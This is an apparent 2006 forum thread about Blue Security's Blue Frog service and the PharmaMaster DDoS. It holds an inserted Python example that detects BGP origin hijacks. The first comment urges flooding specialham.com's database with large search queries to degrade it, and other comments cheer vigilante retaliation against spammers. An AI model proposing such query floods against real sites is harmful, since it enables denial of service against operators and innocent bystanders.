Try that on specialham also... I played around with the text search query string, had it look 5 or 6 years in the past and pull 3000 records. A few hundred of these queries will probably bring down the db to a crawl.
Only for some types of spam; message placement will still go out. Stuff like political ads and proselytizing where no response is needed will still go out. But anyone trying to sell some questionable product from a website or email drop is not going to want to get hammered with the return of a big percentage of the spam emails.
Phishing and other forms of identity theft are also going to be a lot harder.
If you go to the Blue Security site, you'll see they have multiple classes of spam and responses to each class. Some stuff gets bounced to the FDA, some to the BSA, even some to the MPAA. Child porn looks like it goes to Interpol.
I have no illusions that it will get rid of ALL spam, but it will put the hurt on some spammers and that's 100% better than just trying to filter or ignore the incoming spam.
Starman97@Gmail.com (bring it on spammers)
Actually, this has happened many times, and it is called a Joe Job attack. This is why it is important for spam vigilantes to investigate before taking action. This is one of the things that Blue Security and I with my application do before submitting complaints. Websites that are spamvertised tend to have certain unique characteristics that indicate that they are run by unsavory characters.
1. Registration information not accurate.
2. Website does not list an accurate telephone number or physical location.
3. Information listed on website is not accurate.
4. Website claims to use SSL and does not.
5. Website has logos of one or more certificate authorities when it uses something different or nothing at all.
6. Website offers a product or service that is dodgy or at a too-good-to-be-true price.
7. The webpage code is the same as or very similar to other known spamvertised sites.
8. Website claims membership in a well-respected organization when in fact it has no such membership.
A website with one or even two of these indicators (depending on which ones) may be innocent; however, more than that indicates spam.
You don't have to read the forums (which requires registration). There are plenty of sponsoring advertisers prominently displayed on the specialham.com web pages. If they sponsor the thing, why not send some other business their way too? Whois is your friend, assuming any of this is valid:
Stupid lameness filter. Why do I have to put all this in just to avoid the 'junk' characters complaint? Now it's complaining about too few characters on a line. Is there some easy way around this silliness? The least it could do is be more specific about what it needs to be acceptable. I took off the registration dates and some whitespace to try to make it happy, and then added this fluff -- sorry: LKJHADF LKAJSHD LKAF
Blue Security was perfectly willing to have thousands of innocent third parties suffer collateral damage. In this particular instance, both the original spammer pharmaster and blue security are the bad guys.
lame analogy time
If you, Mr. Hatfield, get in a shooting war feud with your neighbor Mr. McCoy down the block, he shoots first, then you start shooting back, and the Smith, Jones and Farnsworth families all get shot in the ensuing gun battle because you kept cutting into their living rooms for a firing advantage, can you say who all the bad guys are? Blue Security is a "security" company; they can't claim stupid and say "gee, we never thunked that anything else might happen" to the other folks at Tucows and TypePad. OF COURSE it could have escalated over there, and *it did*. You would have had to be a raw net n00b to not see that coming as the next step, a DDoS.
They should have just sucked it up and waited it out for a few days and not involved those other places in the war. Homey ain't buying that "whoops collateral damage" bullshit.
Got a beef with a spammer, a BIG beef? Get on a plane, go find them, have a nice friendly *discussion* with them; THAT is the only way to solve spam. Screwing over other folks in your petty dick swinging competition is not nice. I know it is popular now with the way modern wars are allegedly fought; that's why I say a pox on ALL their houses as well. Too many "god is on our side" idiots out there with advanced weapons who think only "their" side has any legitimate beefs, and if any "inconvenient civilians" get in the way it is "too bad". This deal in cyberspace is very similar, so NO, no side is a good guy in this case; no one stuck to the moral or ethical high road or even the intelligent road or even showed the least shred of common courtesy.
Isn't the DDoS tag a little bit redundant for a submission which appears in Slashdot?
Hi - I would just share with you that while searching "blue security" in Google News, I get a list of articles from several sources - that's all fine (/. comes 3rd). The strange thing is that articles from InformationWeek all seem to have a slant against Blue Security, even repeating false allegations. Are they related or enemy companies?
Example:
"InformationWeek, NY - May 5, 2006
The denial-of-service attack that crashed TypePad and LiveJournal this week was caused by anti-spam company Blue Security,"
http://www.informationweek.com/story/showArticle.jhtml?articleID=187200448
...
Blue Security Denies It's At Fault In Blog Outage
InformationWeek, NY - May 5, 2006
Blue Security's chief executive Friday denied that the server he repointed at a TypePad blog earlier this week brought along a denial of service attack that
Blue Security Shoots Itself, And Thousands Of Other People, In The
InformationWeek, NY - May 5, 2006
By Mitch Wagner. When an outfit called Blue Security launched a service to go after spammers with vigilante justice, any idiot could've foreseen big problems.
Isn't it strange?
Looking now, Blue Security seems to have moved their operations to Prolexic as of a few hours ago. This will buy them some DDoS protection. Prolexic is based in Miami, and most of my traceroutes are getting lost in Phoenix, but I can't tell if that's something Prolexic is doing or a very clever blackhole.
Netvision also seems to have GlobalXing/AS3549 as a transit provider.
My suspicion (since I don't have a looking glass with a historical search) is that someone with access to the main BGP reflectors inside of either UUNET or GlobalXing managed to make an announcement that they had a local router with a route to AS1680, and then that router just blackholed any traffic to those netblocks. It was happening during the L3/Cogent wars last year: L3 was announcing Cogent netblocks and blackholing the traffic. If one major backbone such as UUNet makes a false BGP announcement, it could effectively block much traffic from the US to Israel, but European sites would still mostly see Israel as closer.
My next best theory is that someone at LimeLight Networks (AS3549, a GLBX reseller) is sending poison BGP announcements, but I don't see any in looking glasses.
That kind of technically advanced activity, especially with the potential for huge economic losses, should trigger an FBI investigation. Of course, the FBI isn't going to admit anything or post updates on /. until they hand up indictments to the court and make some arrests.
the AC
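An added example, not code from the thread or from Blue Security, of the origin check that the historical looking glass the poster wishes for would let you run: given the registered origin AS for a set of prefixes, flag any announcement whose origin differs, including a more-specific that wins by longest match over the legitimate aggregate. AS1680 and AS3549 are the numbers named in the comment above; every prefix, AS path and other AS number below is constructed sample data.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass(frozen=True)
class Route:
    prefix: str                 # announced prefix, e.g. "203.0.113.0/24"
    as_path: Tuple[int, ...]    # AS path as seen by the collector, origin last
    collector: str              # label for the vantage point that saw it

    @property
    def origin(self) -> int:
        return self.as_path[-1]

def check_origins(expected: Dict[str, int], routes: List[Route]) -> List[Tuple[Route, str]]:
    """Flag announcements for watched prefixes whose origin AS is not the
    registered one. A more-specific announced by a foreign origin is reported
    separately, because it beats the legitimate aggregate by longest match."""
    watched = {ipaddress.ip_network(p): asn for p, asn in expected.items()}
    findings = []
    for r in routes:
        net = ipaddress.ip_network(r.prefix)
        covering = [w for w in watched if net.subnet_of(w)]
        if not covering:
            continue                      # not a prefix we are watching
        parent = max(covering, key=lambda w: w.prefixlen)
        legit = watched[parent]
        if r.origin == legit:
            continue
        kind = "more-specific hijack" if net != parent else "origin mismatch"
        findings.append((r, f"{kind} seen at {r.collector}: origin AS{r.origin}, "
                            f"expected AS{legit} for {parent}"))
    return findings

# Constructed sample data. AS1680 (Netvision) and AS3549 (GlobalXing) are named
# in the comment; the prefixes and AS64496-64511 are documentation values.
EXPECTED_ORIGINS = {"203.0.113.0/24": 1680, "198.51.100.0/22": 1680}

SAMPLE_ROUTES = [
    Route("203.0.113.0/24", (3549, 1680), "eu-collector"),    # legitimate path
    Route("203.0.113.0/24", (64500, 64496), "us-collector"),  # foreign origin
    Route("198.51.100.0/22", (3549, 1680), "eu-collector"),   # legitimate aggregate
    Route("198.51.100.0/24", (64500, 64496), "us-collector"), # more-specific steals traffic
    Route("192.0.2.0/24", (3549, 64511), "eu-collector"),     # not a watched prefix
]

def sample_findings() -> List[Tuple[Route, str]]:
    return check_origins(EXPECTED_ORIGINS, SAMPLE_ROUTES)

if __name__ == "__main__":
    for route, reason in sample_findings():
        print(f"{route.prefix:18} {reason}")
```

Run against real collector data, the same check is what RPKI origin validation automates; the point here is only to see which vantage points carry the bogus announcement.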
Hemos is like... sci-fi fans; he thinks technology is cool, but he hasn't bothered to understand the science it's based on
Background
Burch = http://www.spamhaus.org/rokso/listing.lasso?-op=c
Brown = http://www.spamhaus.org/rokso/listing.lasso?-op=c
Bragging rights aka self-incriminating evidence:
http://www.specialham.com
That's it, my homework assignment is done. Now can I watch the Simpsons, please Daddy? Pretty please?
Phew! And I thought they were the big boys. They'd have enough checks in place to take care of a situation like this. Could they (Tucows) have actually done something to prevent this exploit? Or is it a weakness of the underlying system?
I remember reading another post on slashdot quite sometime ago where they described how partypoker.com (or some site like that) faced a DDoS hit.
PS: Any ideas if microsoft.com would be vulnerable to an attack like this? If yes, they must be doling out ransom by the millions!
Great link, great read. Now I see why Blue Security moved their operation under the DDOS protection of Prolexic.
Dyslexics of the world untie!
Finally those B**tards are getting what they deserve. Blue has done something that no other company has been able to do... after reading this and the article at http://www.ezee.se/blog/ I'm just waiting for them to accept my application to join the fight!
If the above does not work, try this:
http://www.ezee.se/blog/blog-2-BLUE_SECURITYS_BLUE_FROG_ILLEGALLY_SPAMMING_AND_DDOSING_INNOCENT_SITES.html
I finished downloading the frog and it's installed... but not active because my application is still wait listed, I guess.
Go frog go!
How many of you who were already subscribed before the attack can still use your client without problems?
It seems like the member section of the BS site is down ATM for maintenance. Check http://members.bluesecurity.com/cwa
Smith & Wesson: The original point and click interface
He's a very bright boy and emails his teacher and his grandmother. I will defend Blue Security and will offer money to help support them. I would defend them even if they went to this "Pharmamaster" or whatever his/their name is and shot him. I just signed up here (seems to be a great site) but getting the password emailed to me was a hassle thanks to 64 spam emails coming along with it. Blue Security, if you get any of this: I also own many websites and would offer your traffic as long as you can develop a way to rotate the DNS so that one site doesn't carry all of the load !!! FIGHT BACK !!!